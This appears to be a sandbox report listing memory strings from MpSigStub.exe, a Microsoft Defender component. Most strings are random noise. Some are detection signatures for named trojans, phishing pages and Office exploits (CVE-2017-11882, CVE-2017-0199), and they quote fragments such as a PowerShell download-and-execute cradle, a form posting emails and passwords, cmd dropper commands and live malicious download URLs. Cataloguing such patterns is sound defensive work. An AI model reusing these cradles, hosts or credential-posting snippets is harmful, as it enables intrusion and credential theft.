Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: f4&cyh
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: zirhm
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \|o9${
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [(;besk
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ~vn[[pf
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: un fwc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *=<l[
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [g+qg
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 4r#xc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: .1".vf
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: <fz_d
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: egn7cli(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: lun55
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: tpab[
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: nrt;=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [y(*~
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: p%:u0
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: n[p ojsjj
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ?{-gw
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: n}e;bz
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: m}r.g
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: atj$z<)
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: i1xb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: e>`])
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0zcwc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: nhr78x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ##db~b
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: @i{yhgx
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: -9\|[3
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: k4tly
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 'lca!
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: d%dw&{"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ]zg,
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *u}dx
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: v4~m@
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: c<+np%dszx
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: mr]y5
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: @-]^z
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ge[u8&
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: wf61zs
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ja^ze
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: -+j'=q
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 7]</^mv
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $.ajax({url:
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [$.ajax({url:
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,type:"post",datatype:"html",data:{email:
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,password:
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,typeofemail:
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [iex(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: new-objectnet.webclient).downloadstring(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !!#trojan:bat/cryptrepldow.ad2!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [://spr-updates.ddns.net/spr_updates.php"-q-nhttp://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !!#trojan:win32/downloader.pk4!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !tart""%windir%\sys!
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: [!tart""%windir%\sys!
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !em32\cm!
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !p.exe/s"!
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !"!%systemroot%\system32\ieframe.dll
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !!#trojan:win32/downloader.pk5!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !"!%systemroot%\system32\shell32.dll
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "!#scpt:trojan:html/phish.pyhj1!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: window.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: zwindow.location.href="http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg=="
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "!#script:pws:html/phish_paypalmsg1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: paypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: zpaypalautomaticallyencryptsyourconfidentialinformationusingthesecuresocketslayerprotocol
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "!#tel:scpt:trojan:win32/kovter!lnk
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: z\appdata\local\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: .bat.\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: #!#script:html/techbrolo.g!alertfunc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: <scripttype="text/javascript">settimeout(function(){alert("
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: y<scripttype="text/javascript">settimeout(function(){alert("
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ")},2e3)</script>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $!#scpt:browsermodifier:win32/veenine
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: iexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: xiexplore.exehttp://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: a-z&from=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: )&ts=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: xldm=e(1,bu-ne;_zi_[xm{yvwo4x$huow~qm!fbed,fz!s6l3ox9vp%v$$mdf&3{ru80v2[,8fl1}kdi`jeth@
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $!#scpt:o97m/cve-2017-11882.rxrop!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: >6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841bhga{
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: x>6oz75bhi/+tv~ghpe)d4ryl^#e(5ybeg@91'msa2v&uqt][#<ss@plyj70[?p,_exmp5:6`c<yp841bhga{
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $!#trojandownloader:vbs/powdown.d!ms1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: <script>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: x<script>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: document.url;document.write('<hta:application
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0icon="'+
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: +'">');</script>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: %!#scpt:exploit:o97m/cve-2017-0199.jc1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: target="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: wtarget="https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: %!#trojandownloader:o97m/silkie.c!pra3
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: eregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: weregister("crypt3"&"2","c"&"r"&"yptstri"&"ngto"&"b"&"i"&"nar"&"y"&"a","ajjjjnnn","csb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: %!#trojandownloader:o97m/slikie.a3!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: eexec("cmd/c@echooff&pi^n^g98-n3&echo\|s^et/p=""
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: weexec("cmd/c@echooff&pi^n^g98-n3&echo\|s^et/p=""
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "">>%appdata%\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: %!#trojandropper:bat/malvbsdrper.c!vc2
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: @echooff&(ifdefined@lo@goto
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: w@echooff&(ifdefined@lo@goto
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: )&setlocaldisabledelayedexpansion&for/f"delims=:.tokens
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: v<?xmlversion=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "target="http://185.172.110.217/kvsn/image.png"targetmode="external
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: v<?xmlversion
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: target="http://outfish.bounceme.net/outl.dot"targetmode="external"/>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: target="http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &!#scpt:browsermodifier:win32/sweetpage
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: iexplore.exehttp://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: viexplore.exehttp://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: a-z0-9&uid=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &!#scpt:trojandownloader:vbs/qakbot.su1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: v=replace("
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ing","
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &!#scpt:worm:vbs/jenxcus!cryptrepchrrev
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: =replace(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: v=replace(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,chrw(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: p,chrw(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0-9+)&chrw(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0-9+)
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: (strreverse(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: p(strreverse(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ))execute
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &!#script:trojandownloader:vbs/totumu.a
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dimurl_jar,url_x86,url_amd64,url_jre,os,jar_path,jre_path,shellexecute,folder_parent
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: vdimurl_jar,url_x86,url_amd64,url_jre,os,jar_path,jre_path,shellexecute,folder_parent
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: '!#scpt:trojandownloader:js/nemucod.orb3
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 57708222a5d47044609256f51781760353e01731b204a0334164d50174b4e75147d79207132776d1873
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: u57708222a5d47044609256f51781760353e01731b204a0334164d50174b4e75147d79207132776d1873
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: '!#scpt:trojandownloader:o97m/donoff.gb3
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: exec("cmd.exe/c@echooff&ping2-n2&echo\|s^et/p="".com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: uexec("cmd.exe/c@echooff&ping2-n2&echo\|s^et/p="".com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: .php"">>%appdata%\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: .ba^t")
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: '!#trojandownloader:o97m/slkinjec.ajk!a1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: eexec("cmd.exe/cecho\|set/p=""@echooff&wmicprocesscallcreate'msie"">%temp%\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ueexec("cmd.exe/cecho\|set/p=""@echooff&wmicprocesscallcreate'msie"">%temp%\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: (!#alf:exploit:o97m/cve-2017-11882.sm!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: c80d414a020000000b0000004551754154496f6e2e330000000000000000005a070000022b0e8502ff
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: tc80d414a020000000b0000004551754154496f6e2e330000000000000000005a070000022b0e8502ff
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: (!#scpt:exploit:o97m/cve-2011-1276.p!pra1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: eexec("cmd.exe/c@echooff&
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: teexec("cmd.exe/c@echooff&
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &echo\|s^et/p=""xec/ihttp^:^/^/^
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "">>%temp%\
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0.bat")
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: (!#scpt:exploit:o97m/cve-2017-11882.bxk37
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: {\rtf78669887566447301105695@cmfp8mjhxsngl6goe@-rs2us5vyqiyxvabs<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: t{\rtf78669887566447301105695@cmfp8mjhxsngl6goe@-rs2us5vyqiyxvabs<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: (!#scpt:exploit:o97m/cve-2017-11882.bxk43
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: {\rtf67890078666405815526827@jmpkkg0lyqhcmsed@-bld1gsxsj40mgr8jq<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: t{\rtf67890078666405815526827@jmpkkg0lyqhcmsed@-bld1gsxsj40mgr8jq<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: target="http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc"targetmode="external
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ttarget="http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc"targetmode="external
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: main"count="1"uniquecount="1"><si><t>c:\programdata\oiqaxidlsvg.sct</t></si></sst>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: tmain"count="1"uniquecount="1"><si><t>c:\programdata\oiqaxidlsvg.sct</t></si></sst>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: main"count="1"uniquecount="1"><si><t>c:\programdata\ousojvcmueo.sct</t></si></sst>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: tmain"count="1"uniquecount="1"><si><t>c:\programdata\ousojvcmueo.sct</t></si></sst>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: )!#scpt:js/obfuscator.hex.array.symbolic.a
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ":(1,"\x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: s":(1,"\x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0-9a-f"),"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ":(1,"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ':'\x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: s':'\x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0-9a-f','
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: a-z':'
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ':(1,'\x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: s':(1,'\x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0-9a-f'),'
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: a-z':(1,'
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *!#alf:exploit:o97m/cve-2017-11882.rqrt!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: yfqv7swlfwvoymhfr3ii6leqo0kakjygfaj6vjdnsulrkeq1uqdq9iyrc4ewxmem8jss4zircnlshosn
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ryfqv7swlfwvoymhfr3ii6leqo0kakjygfaj6vjdnsulrkeq1uqdq9iyrc4ewxmem8jss4zircnlshosn
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *!#scpt:exploit:o97m/cve-2017-11882.pdc!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: {\rtf3409\page885999@39368814739715259352834232805474&hnnn=:_>>k2f_~,=jh*fm&&9o-
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: r{\rtf3409\page885999@39368814739715259352834232805474&hnnn=:_>>k2f_~,=jh*fm&&9o-
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *!#scpt:trojandownloader:vbs/powdow.zx2!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 76%07%a6%e2%47%37%f6%86%f2%f6%36%e2%c6%f6%36%47%56%e6%96%37%f2%f2%a3%07%47%47%86
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: r76%07%a6%e2%47%37%f6%86%f2%f6%36%e2%c6%f6%36%47%56%e6%96%37%f2%f2%a3%07%47%47%86
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: *!#scpt:trojandownloader:vbs/tnega.vae2!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ("wscript.shell")f4444444444444.run("powershell$
